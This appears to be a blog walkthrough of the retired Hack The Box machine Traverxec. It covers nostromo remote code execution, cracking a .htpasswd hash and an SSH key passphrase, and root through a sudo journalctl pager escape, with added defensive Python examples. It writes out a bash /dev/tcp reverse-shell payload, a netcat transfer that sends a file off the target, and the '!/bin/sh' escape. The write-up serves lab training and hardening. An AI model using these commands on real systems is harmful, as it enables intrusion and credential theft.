HTB Walkthrough: Traverxec (retired)

Shraddha M.
5 min read, Apr 10, 2021

Traverxec is a retired box on HTB and is part of TJ Null’s list of OSCP-like boxes.

Hostname: Traverxec | Difficulty Level: Easy | Operating System: Linux

NMAP Scan

Nmap shows two ports open: 22 (SSH) and 80 (HTTP).

HTTP Enumeration

From the nmap results, port 80 is served by ‘nostromo 1.9.6’ (nhttpd) rather than a common web server such as Apache or nginx. Searching searchsploit for that version turns up ‘nostromo 1.9.6 - Remote Code Execution’ (EDB-ID 47837, CVE-2019-16278), an unauthenticated directory traversal that reaches /bin/sh on the server. Mirror the script locally:
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ searchsploit nostromo 1.9.6
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ searchsploit -m multiple/remote/47837.py

Rename ‘47837.py’ to ‘rce.py’ and run it with a harmless command first to confirm execution:
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ python rce.py 10.10.10.165 80 "ls -lrt"

The output of ‘ls -lrt’ comes back in the HTTP response, which confirms unauthenticated command execution as the web server’s user. Now swap the directory listing for a reverse shell:
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ python rce.py 10.10.10.165 80 "bash -c 'bash -i >& /dev/tcp/<Kali IP>/9876 0>&1'"

Have a netcat listener running in another tab before sending the payload:
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ nc -lvnp 9876

The listener receives a shell as ‘www-data’.
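The exploit script does the request building for you, but the bug class it abuses, a traversal filter that inspects the raw request line before the path is decoded, is worth seeing side by side with a correct check. The block below is an added example (my code, not the original post’s and not the contents of 47837.py). It models a toy server: vulnerable_check greps the raw URL for ‘../’ and only afterwards percent-decodes the path and drops control characters, which is an assumption about the toy server and not a description of nostromo’s source; hardened_check decodes first, rejects control characters outright, normalises the path and confines it to a document root. DOCROOT and the function names are assumptions. The ‘/.%0d./’ sequence is the shape of the traversal sent by the public exploit (%0d is an encoded carriage return).

```python
"""Added example: a traversal filter applied before decoding vs. one applied after.

Assumptions (not from the page): DOCROOT is a hypothetical document root, and the
"toy server" modelled by vulnerable_check drops control characters from the decoded
path. That is a model of the bug class, not nostromo's actual code.
"""
import posixpath
from typing import Optional, Tuple
from urllib.parse import unquote

DOCROOT = "/var/www/htdocs"  # hypothetical document root


def _decode_and_strip_controls(raw_url: str) -> str:
    """Percent-decode, then discard control characters (the toy server's behaviour)."""
    decoded = unquote(raw_url)
    return "".join(ch for ch in decoded if ord(ch) >= 0x20)


def vulnerable_check(raw_url: str) -> Optional[str]:
    """Return the path the toy server would open, or None if its filter blocks it.

    The filter runs on the RAW url, so "/.%0d./" never matches "../"; after decoding
    "%0d" becomes "\r", the control strip removes it, and "/../" reaches the filesystem.
    """
    if "../" in raw_url:
        return None
    path = _decode_and_strip_controls(raw_url)
    return DOCROOT + path  # no normalisation: ".." segments are passed straight through


def hardened_check(raw_url: str) -> Optional[str]:
    """Decode first, reject control characters, normalise lexically, then confine."""
    decoded = unquote(raw_url)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return None  # CR, LF, NUL and friends never belong in a URL path
    # Resolve "." and ".." and require the result to stay inside DOCROOT.
    full = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    if full != DOCROOT and not full.startswith(DOCROOT + "/"):
        return None
    return full


def compare(raw_url: str) -> Tuple[bool, bool]:
    """(allowed by the vulnerable filter, allowed by the hardened filter)."""
    return vulnerable_check(raw_url) is not None, hardened_check(raw_url) is not None


if __name__ == "__main__":
    # Constructed request paths; the third has the shape used by the public exploit.
    for url in ["/index.html", "/../../etc/passwd",
                "/.%0d./.%0d./.%0d./.%0d./bin/sh", "/%2e%2e/%2e%2e/etc/passwd"]:
        allowed_vuln, allowed_hard = compare(url)
        print(f"{url:40} vulnerable={allowed_vuln!s:5} hardened={allowed_hard!s:5}")
```

The general lesson is ordering: any allow/deny decision on a path has to be made on the canonical form (decoded, control characters rejected, ‘..’ resolved), never on the bytes as they arrived. Both ‘.%0d./’ and plain ‘%2e%2e/’ get past the raw-string filter and are stopped by the hardened one.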

The user flag ‘user.txt’ is in /home/david, so the next step is to escalate to ‘david’. The nostromo config in /var/nostromo/conf also names david as the server admin:

www-data@traverxec: cat nhttpd.conf
# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb

The ‘.htpasswd’ file in the same directory is world-readable and worth a look:
www-data@traverxec:/var/nostromo/conf$ ls -la
ls -la
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27 2019 .
drwxr-xr-x 6 root root 4096 Oct 25 2019 ..
-rw-r--r-- 1 root bin 41 Oct 25 2019 .htpasswd
-rw-r--r-- 1 root bin 2928 Oct 25 2019 mimes
-rw-r--r-- 1 root bin 498 Oct 25 2019 nhttpd.conf

www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

The value after ‘david:’ is an md5crypt hash (the ‘$1$salt$digest’ format, hashcat mode 500). Save it to a file and run it against rockyou. Use single quotes when writing it out: inside double quotes the shell would expand ‘$1’ and ‘$e7NfNpNi’ as variables and you would be cracking a mangled hash.
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ echo '$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/' > hash.txt

┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ hashcat -m 500 hash.txt -a 0 /usr/share/wordlists/rockyou.txt

$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me

Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started.....: Thu Apr 8 21:12:17 2021 (20 mins, 8 secs)
Time.Estimated...: Thu Apr 8 21:32:25 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9282 H/s (11.03ms) @ Accel:32 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10776448/14344385 (75.13%)
Rejected.........: 0/10776448 (0.00%)
Restore.Point....: 10776320/14344385 (75.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidates.#1....: Nowonly4me -> November17,1994

Started: Thu Apr 8 21:11:36 2021
Stopped: Thu Apr 8 21:32:26 2021
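Before reusing a cracked credential it is worth confirming it independently of the cracker. The block below is an added example (not from the original post): a pure-Python md5crypt, the algorithm behind ‘$1$’ hashes, used to recompute david’s hash from the recovered word and the salt embedded in the hash. Only the stored hash and the candidate password come from the page; md5crypt, parse_md5crypt and verify are my names, and the implementation follows the classic FreeBSD crypt(3) routine (1000 rounds, interleaved custom base-64 output).

```python
"""Added example: recompute an md5crypt ($1$) hash to double-check a cracked password.

Only the hash and the candidate come from the walkthrough; everything else is the
standard md5crypt algorithm written out with hashlib so it runs offline.
"""
import hashlib
import hmac
from typing import Optional, Tuple

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """Emit `count` base-64 characters, least significant 6 bits first (crypt order)."""
    out = []
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str, magic: str = "$1$") -> str:
    """Return the full '$1$salt$digest' string for password and salt (salt <= 8 chars)."""
    pw = password.encode()
    salt = salt[:8]
    sb = salt.encode()

    # Initial context: pw, magic, salt, then len(pw) bytes of MD5(pw + salt + pw).
    ctx = hashlib.md5(pw + magic.encode() + sb)
    final = hashlib.md5(pw + sb + pw).digest()
    for i in range(len(pw), 0, -16):
        ctx.update(final[: min(16, i)])
    # The original's "something really weird" loop: per bit of len(pw),
    # append a NUL byte (bit set) or the first password byte (bit clear).
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds with the fixed alternation pattern of crypt(3).
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sb)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    # Interleaved base-64 encoding of the 16 digest bytes, exactly as crypt(3) emits it.
    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"{magic}{salt}${encoded}"


def parse_md5crypt(stored: str) -> Optional[Tuple[str, str]]:
    """Split '$1$salt$digest' into (salt, digest); None if it is not an md5crypt string."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1":
        return None
    return parts[2], parts[3]


def verify(stored: str, candidate: str) -> bool:
    """True if candidate reproduces the stored $1$ hash (constant-time comparison)."""
    parsed = parse_md5crypt(stored)
    if parsed is None:
        return False
    salt, _ = parsed
    return hmac.compare_digest(md5crypt(candidate, salt), stored)


if __name__ == "__main__":
    STORED = "$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/"  # david's .htpasswd entry from the page
    print(verify(STORED, "Nowonly4me"))  # hashcat's answer
    print(verify(STORED, "password"))
```

The same check is what hashcat’s potfile entry represents; doing it by hand also makes the cost model concrete: 1000 MD5 rounds per guess is why the run above managed only ~9 kH/s on a CPU, and why md5crypt is still far weaker than a modern memory-hard KDF.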

The cracked password does not get you an SSH login as david: it is the web server’s .htpasswd credential, not his system password. Back to the config file, the HOMEDIRS section this time:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www

A search for “nostromo homedirs public” leads to the nhttpd man page: https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=NHTTPD . The HOMEDIRS section explains that ‘To access a users home directory enter a ~ in the URL followed by the home directory name’.

Browsing to ‘http://10.10.10.165/~david/’ returns a page. The man page also says ‘You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.’, so only the public_www subdirectory of each home is served over HTTP. From the shell, /home/david cannot be listed; check its permissions:

www-data@traverxec:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Oct 25 2019 .
drwxr-xr-x 18 root root 4096 Oct 25 2019 ..
drwx--x--x 5 david david 4096 Oct 25 2019 david

The mode is drwx--x--x (711): david has full access, while group and others have only the execute (search) bit. Without the read bit you cannot list the directory, but with the execute bit you can still traverse it to a name you already know, and the config just told us the name. ‘cd’ straight into ‘public_www’:

www-data@traverxec:/home/david/public_www$ ls -la
ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 2019 .
drwx--x--x 5 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 402 Oct 25 2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area

Listing ‘protected-file-area’ reveals a tarball of SSH identity files:
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz

Copy the archive to Kali with netcat. Start the listener on Kali first, then push the file from the target; a raw netcat stream has no integrity check, so compare sha256sum output on both ends before extracting:
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001 > backup.tgz

www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.14.14 9001 < backup-ssh-identity-files.tgz

┌──(kali㉿kali)-[~/labs/HTB/Traverxec/1]
└─$ tar -xzvf backup.tgz

The archive contains david’s .ssh directory, including an RSA private key, but the key is passphrase-protected. Convert it to a john-compatible hash with ssh2john:
┌──(kali㉿kali)-[~/…/1/home/david/.ssh]
└─$ python3 /usr/share/john/ssh2john.py traver.ssh > hash.txt

┌──(kali㉿kali)-[~/…/1/home/david/.ssh]
└─$ sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

john recovers the passphrase ‘hunter’. SSH in with the key and that passphrase for a shell as david; his home directory has a ~/bin folder with a server-stats script worth reading:
┌──(kali㉿kali)-[~/…/1/home/david/.ssh]
└─$ ssh -i id_rsa david@10.10.10.165

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo “Last 5 journal log lines:”
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line runs journalctl through sudo, so that one command executes as root (run ‘sudo -l’ as david to see the exact rule that permits it). ‘-n5’ prints the last five journal entries and ‘-unostromo.service’ is ‘-u nostromo.service’, selecting the nostromo unit; piping into cat keeps journalctl from opening its pager when the script runs.

journalctl reads the systemd journal. Its man page (https://man7.org/linux/man-pages/man1/journalctl.1.html) notes: ‘The output is paged through less by default, and long lines are “truncated” to screen width.’ That pager is the weak point: less can run a shell with ‘!’, which is why GTFOBins lists journalctl (https://gtfobins.github.io/gtfobins/journalctl/). Use the ‘Shell’ method described there.

The escalation is two steps: run the sudo-permitted journalctl command directly (without the ‘| cat’), then type ‘!/bin/sh’ at the less prompt. The catch is that the command prints only five lines; if they fit on screen, less quits immediately (journalctl’s default pager options include less’s -F, quit if the output fits on one screen) and there is never a prompt to type at. Shrink the terminal with stty so the output overflows it:

david@traverxec:~/bin$ stty rows 10 columns 50
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/sh

That drops you into a root shell, and the root flag follows.
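The root cause here is a sudo rule that hands a user an interactive pager as root. The block below is an added example (my code, not from the original post): a small audit that walks ‘sudo -l’ output and flags rules whose command can spawn a pager, an editor or a shell, plus rules tagged NOPASSWD. The SAMPLE text is constructed for the example (the journalctl line mirrors the command in the script above, but the rule text is assumed, not copied from the box), PAGER_SPAWNERS is my own short list drawn from GTFOBins rather than a complete one, and audit_sudo_rule / audit_sudo_output are my names. The ‘--no-pager’ variant shows the fix: with that flag in the sudoers command spec, sudo only accepts the exact argument list, and journalctl never opens less.

```python
"""Added example: audit 'sudo -l' output for rules that hand out a pager/editor as root.

Constructed input and an intentionally short GTFOBins-style list; extend both for real use.
"""
import re
import shlex
from typing import List

# Binaries that open less, an editor or a shell by default; GTFOBins has the full list.
PAGER_SPAWNERS = {"journalctl", "systemctl", "less", "more", "man", "git", "vim", "vi"}

# Flags that disable the pager for journalctl/systemctl and so neutralise the '!' trick.
NO_PAGER_FLAGS = {"--no-pager"}

# "(runas) TAG: TAG: /path/to/cmd args"  as printed by sudo -l
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def audit_sudo_rule(line: str) -> List[str]:
    """Return findings for one 'sudo -l' rule line; an empty list means nothing flagged."""
    m = _RULE_RE.match(line)
    if not m:
        return []  # header / Defaults lines are not rules
    findings: List[str] = []
    runas = m.group("runas").strip()
    cmd = m.group("cmd").strip()
    if cmd == "ALL":
        return [f"unrestricted command as ({runas})"]
    argv = shlex.split(cmd)
    binary = argv[0].rsplit("/", 1)[-1]
    if binary in PAGER_SPAWNERS and not (set(argv[1:]) & NO_PAGER_FLAGS):
        findings.append(
            f"{binary} as ({runas}) can spawn a pager/editor; "
            "'!/bin/sh' at the less prompt gives a shell (add --no-pager or change the rule)"
        )
    if "NOPASSWD" in m.group("tags"):
        findings.append("NOPASSWD: no credential prompt stands between the user and the escalation")
    return findings


def audit_sudo_output(text: str) -> List[str]:
    """Audit every rule line of a 'sudo -l' dump, returning 'rule -> finding' strings."""
    out = []
    for line in text.splitlines():
        for finding in audit_sudo_rule(line):
            out.append(f"{line.strip()} -> {finding}")
    return out


# Constructed 'sudo -l' output for the example; the rule text is assumed, not from the box.
SAMPLE = """Matching Defaults entries for david on traverxec:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User david may run the following commands on traverxec:
    (ALL) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
    (root) /usr/bin/journalctl -n5 -unostromo.service --no-pager
    (root) /usr/bin/systemctl status nostromo.service
"""

if __name__ == "__main__":
    for finding in audit_sudo_output(SAMPLE):
        print(finding)
```

A rule that survives this audit is not automatically safe (argument-free rules, wildcards and env_keep settings need their own checks), but anything it flags is worth fixing before an attacker with the user’s shell gets to it.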
